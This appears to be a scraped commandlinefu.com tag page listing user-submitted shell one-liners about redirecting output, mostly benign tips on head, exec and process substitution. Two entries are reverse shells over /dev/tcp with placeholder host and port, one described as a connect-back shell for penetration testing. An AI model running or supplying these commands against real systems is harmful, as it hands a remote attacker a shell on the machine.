Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

Hide

News

2011-03-12 - Confoo 2011 presentation
Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands
To try and put and end to the spamming, new commands require moderation before they will appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner
Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed
Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.
Hide

Tags

Hide

Functions

Commands tagged redirecting output from sorted by
Terminal - Commands tagged redirecting output - 11 results
less file.lst | head -n 50000 > output.txt
2011-09-05 05:26:04
User: Richie086
Functions: head less
-3

Useful for situations where you have word lists or dictionaries that range from hundreds of megabytes to several gigabytes in size. Replace file.lst with your wordlist, replace 50000 with however many lines you want the resulting list to be in total. The result will be redirected to output.txt in the current working directory. It may be helpful to run wc -l file.lst to find out how many lines the word list is first, then divide that in half to figure out what value to put for the head -n part of the command.

command >&-
<COMMAND> |:
2011-08-28 23:48:29
User: h3xx
25

This is shorter and actually much faster than >/dev/null (see sample output for timings)

Plus, it looks like a disappointed face emoticon.

{ command1 args1 ; command2 args2 ; ... }
2011-04-12 20:01:51
User: IF_Rock
0

{ ... } vs ( ... ) reduces the process count, I believe.

Typically, I use this logic to redirect a series of commands to a pipe -- { command1 args1 ; command2 args2}|less -- or file -- { command1 args1 ; command2 args2}>foo -- or to spawn the series as a background process -- { ... } & .

bash -i >& /dev/tcp/IP/PORT 0>&1
<command> 2> <file>
TIME=$( { time YOUR_COMMAND_HERE; } 2>&1 ) ; echo $TIME
2010-11-18 15:48:05
User: allrightname
Functions: echo time
1

I've had a horrible time trying to pipe the output of some shell built-ins like 'time' to other programs. The built-in doesn't output to stdout or stderr most of the time but using the above will let you pipe the output to something else.

exec 2>&1
2010-08-05 08:24:18
User: redy
Functions: exec
9

You have a script where =ALL= STDERR should be redirected to STDIN and you don't want to add "2>&1" at the end of each command...

E.G.:

ls -al /foo/bar 2>&1

Than just add this piece of code at the beginning of your script!

I hope this can help someone. :)

exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
2010-03-18 17:25:08
User: truemilk
Functions: exec
2

Connect-back shell using Bash built-ins. Useful in a web app penetration test, if it's the case of a locked down environment, without the need for file uploads or a writable directory.

--

/dev/tcp and /dev/udb redirects must be enabled at compile time in Bash.

Most Linux distros enable this feature by default but at least Debian is known to disable it.

--

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr)
2009-12-01 03:58:04
User: tylerl
25

You can use [n]> combined with >(cmd) to attach the various output file descriptors to be the input of different commands.

S=$SSH_TTY && (sleep 3 && echo -n 'Peace... '>$S & ) && (sleep 5 && echo -n 'Love... '>$S & ) && (sleep 7 && echo 'and Intergalactic Happiness!'>$S & )
2009-08-19 07:57:16
User: AskApache
Functions: echo sleep
-2

Ummmm.. Saw that gem on some dead-head hippies VW bus at phish this summer.. It's actually one of my favorite ways of using bash, very clean. It shows what you can do with the cool advanced features like job control, redirection, combining commands that don't wait for each other, and the thing I like the most is the use of the ( ) to make this process heirarchy below, which comes in very handy when using fifos for adding optimization to your scripts or commands with similar acrobatics.

F UID PID PPID WCHAN RSS PSR CMD

1 gplovr 30667 1 wait 1324 1 -bash

0 gplovr 30672 30667 - 516 3 \_ sleep 3

1 gplovr 30669 1 wait 1324 1 -bash

0 gplovr 30673 30669 - 516 0 \_ sleep 5

1 gplovr 30671 1 wait 1324 1 -bash

0 gplovr 30674 30671 - 516 1 \_ sleep 7